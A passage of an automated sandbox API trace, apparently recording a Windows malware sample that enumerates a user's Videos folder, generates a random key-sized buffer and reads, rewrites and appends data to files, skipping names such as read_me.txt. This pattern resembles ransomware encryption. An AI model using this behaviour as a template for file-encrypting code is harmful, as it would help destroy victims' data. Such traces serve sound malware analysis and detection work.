RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f980 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f980 | out: hHeap=0x4f10000) returned 1 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.414] GetProcessHeap () returned 0x4f10000 [0076.414] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.415] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.415] GetProcessHeap () returned 0x4f10000 [0076.416] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.416] GetProcessHeap () returned 0x4f10000 [0076.416] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.416] GetProcessHeap () returned 0x4f10000 [0076.416] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.416] GetProcessHeap () returned 0x4f10000 [0076.416] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.416] GetProcessHeap () returned 0x4f10000 [0076.416] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.416] GetProcessHeap () returned 0x4f10000 [0076.416] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0076.416] GetProcessHeap () returned 0x4f10000 [0076.416] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.416] GetProcessHeap () returned 0x4f10000 [0076.416] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0076.416] GetProcessHeap () returned 0x4f10000 [0076.416] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0076.416] GetProcessHeap () returned 0x4f10000 [0076.416] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.416] GetProcessHeap () returned 0x4f10000 [0076.416] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0076.416] SetFilePointerEx (in: hFile=0x7b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.416] WriteFile (in: hFile=0x7b8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.416] WriteFile (in: hFile=0x7b8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.416] GetProcessHeap () returned 0x4f10000 [0076.416] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0076.417] GetProcessHeap () returned 0x4f10000 [0076.417] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0076.417] GetProcessHeap () returned 0x4f10000 [0076.417] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0076.417] CloseHandle (hObject=0x7b8) returned 1 [0076.420] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 8 [0077.521] SetFilePointerEx (in: hFile=0x7dc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.521] ReadFile (in: hFile=0x7dc, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0077.521] SetFilePointerEx (in: hFile=0x7dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.522] GetProcessHeap () returned 0x4f10000 [0077.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0077.522] GetProcessHeap () returned 0x4f10000 [0077.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d560a0 [0077.522] SystemFunction036 (in: RandomBuffer=0x7d560a0, RandomBufferLength=0x20 | out: RandomBuffer=0x7d560a0) returned 1 [0077.522] GetProcessHeap () returned 0x4f10000 [0077.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0077.522] ReadFile (in: hFile=0x7dc, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.616] SetFilePointerEx (in: hFile=0x7dc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.617] WriteFile (in: hFile=0x7dc, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12378 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12378, Size=0x20) returned 0x7d568c0 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12378 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12378, Size=0x20) returned 0x7d565f0 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12378 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d123b8 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d123b8 | out: hHeap=0x4f10000) returned 1 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d123b8 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d123b8 | out: hHeap=0x4f10000) returned 1 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.617] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d123b8 [0077.617] GetProcessHeap () returned 0x4f10000 [0077.618] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d123b8 | out: hHeap=0x4f10000) returned 1 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d123b8 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d123b8 | out: hHeap=0x4f10000) returned 1 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d123b8 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d123b8 | out: hHeap=0x4f10000) returned 1 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d123b8 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d123b8 | out: hHeap=0x4f10000) returned 1 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d123b8 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.618] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d123b8 | out: hHeap=0x4f10000) returned 1 [0077.618] GetProcessHeap () returned 0x4f10000 [0077.619] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d123b8 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d123b8 | out: hHeap=0x4f10000) returned 1 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f980 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d399d8 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f980 | out: hHeap=0x4f10000) returned 1 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d39be0 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d399d8 | out: hHeap=0x4f10000) returned 1 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d399d8 [0077.619] GetProcessHeap () returned 0x4f10000 [0077.619] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d39be0 | out: hHeap=0x4f10000) returned 1 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d39be0 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d399d8 | out: hHeap=0x4f10000) returned 1 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d399d8 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d39be0 | out: hHeap=0x4f10000) returned 1 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d39be0 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d399d8 | out: hHeap=0x4f10000) returned 1 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d399d8 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d39be0 | out: hHeap=0x4f10000) returned 1 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d39be0 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d399d8 | out: hHeap=0x4f10000) returned 1 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d399d8 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d39be0 | out: hHeap=0x4f10000) returned 1 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d39be0 [0077.620] GetProcessHeap () returned 0x4f10000 [0077.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d399d8 | out: hHeap=0x4f10000) returned 1 [0077.621] GetProcessHeap () returned 0x4f10000 [0077.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d399d8 [0077.621] GetProcessHeap () returned 0x4f10000 [0077.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d39be0 | out: hHeap=0x4f10000) returned 1 [0077.621] GetProcessHeap () returned 0x4f10000 [0077.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d39be0 [0077.621] GetProcessHeap () returned 0x4f10000 [0077.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d399d8 | out: hHeap=0x4f10000) returned 1 [0077.621] GetProcessHeap () returned 0x4f10000 [0077.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d399d8 [0077.621] GetProcessHeap () returned 0x4f10000 [0077.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d39be0 | out: hHeap=0x4f10000) returned 1 [0077.621] GetProcessHeap () returned 0x4f10000 [0077.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0077.621] GetProcessHeap () returned 0x4f10000 [0077.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d399d8 | out: hHeap=0x4f10000) returned 1 [0077.621] GetProcessHeap () returned 0x4f10000 [0077.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.621] GetProcessHeap () returned 0x4f10000 [0077.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d565f0 | out: hHeap=0x4f10000) returned 1 [0077.621] GetProcessHeap () returned 0x4f10000 [0077.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0077.621] GetProcessHeap () returned 0x4f10000 [0077.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d568c0 | out: hHeap=0x4f10000) returned 1 [0077.621] SetFilePointerEx (in: hFile=0x7dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.621] WriteFile (in: hFile=0x7dc, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0077.621] WriteFile (in: hFile=0x7dc, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0077.622] GetProcessHeap () returned 0x4f10000 [0077.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0077.622] GetProcessHeap () returned 0x4f10000 [0077.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0077.622] GetProcessHeap () returned 0x4f10000 [0077.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0077.622] CloseHandle (hObject=0x7dc) returned 1 [0077.623] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 24 [0078.569] GetProcessHeap () returned 0x4f10000 [0078.569] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a80048 [0078.570] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\*") returned 50 [0078.570] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\*", lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8230db70, ftCreationTime.dwHighDateTime=0x1d4d44c, ftLastAccessTime.dwLowDateTime=0x24dc9560, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24dc9560, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe768 [0078.573] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\.") returned 50 [0078.573] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8230db70, ftCreationTime.dwHighDateTime=0x1d4d44c, ftLastAccessTime.dwLowDateTime=0x24dc9560, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24dc9560, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0078.573] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\..") returned 51 [0078.573] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d52c50, ftCreationTime.dwHighDateTime=0x1d4c8d9, ftLastAccessTime.dwLowDateTime=0xeb9327a0, ftLastAccessTime.dwHighDateTime=0x1d4ce8c, ftLastWriteTime.dwLowDateTime=0xeb9327a0, ftLastWriteTime.dwHighDateTime=0x1d4ce8c, nFileSizeHigh=0x0, nFileSizeLow=0x10e91, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="4p0JS35Ljis1Fy4ggt0.avi", cAlternateFileName="4P0JS3~1.AVI")) returned 1 [0078.573] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\4p0JS35Ljis1Fy4ggt0.avi") returned 72 [0078.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\4p0JS35Ljis1Fy4ggt0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lewhsqt\\4p0js35ljis1fy4ggt0.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e8 [0078.573] StrStrW (lpFirst="4p0js35ljis1fy4ggt0.avi", lpSrch="read_me.txt") returned 0x0 [0078.573] StrStrW (lpFirst="4p0js35ljis1fy4ggt0.avi", lpSrch="autoexec.bat") returned 0x0 [0078.573] StrStrW (lpFirst="4p0js35ljis1fy4ggt0.avi", lpSrch="desktop.ini") returned 0x0 [0078.574] StrStrW (lpFirst="4p0js35ljis1fy4ggt0.avi", 